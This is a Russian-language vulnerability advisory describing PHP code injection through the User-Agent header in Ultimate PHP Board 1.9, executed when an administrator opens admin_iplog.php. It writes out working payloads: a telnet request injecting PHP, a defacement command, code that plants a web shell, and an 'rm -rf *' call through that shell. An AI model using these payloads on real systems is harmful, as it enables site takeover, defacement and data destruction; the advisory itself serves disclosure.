| Дата публикации: | 29.05.2003 | 
| Дата изменения: | 17.10.2006 | 
| Всего просмотров: | 2122 | 
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 | 
| CVE ID: | Нет данных | 
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных | 
| Наличие эксплоита: | Нет данных | 
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный пользователь может выполнить произвольный PHP код на системе как UPB администратор. F0KP сообщает, что в этом форуме присутствует серьезная уязвимость, которая позволяетатакующему выполнять произвольный php код. UPB протоколирует некоторую информацию о посетителях [ такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории `db', который называется `iplog'. затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает `iplog'. Например: e@some_host$ telnet hostname 80 Connected to hostname at 80 GET /board/index.php HTTP/1.0 User-Agent: <? phpinfo(); ?>когда администратор вызовет admin_iplog.php, ваш код php будет выполнен. Пример: 1. <? system( "echo \'hacked\' > ../index.html" ); ?>дефейсит главную страницу форума. 2. system( "echo \' system( $cmd ); ?>\' > ../../tcsh.php" ); ?> создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf * после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php. Уязвимость обнаружена в Ultimate PHP Board 1.9 | 
| Ссылки: | UPB: Захват Форума/Веб-сайта |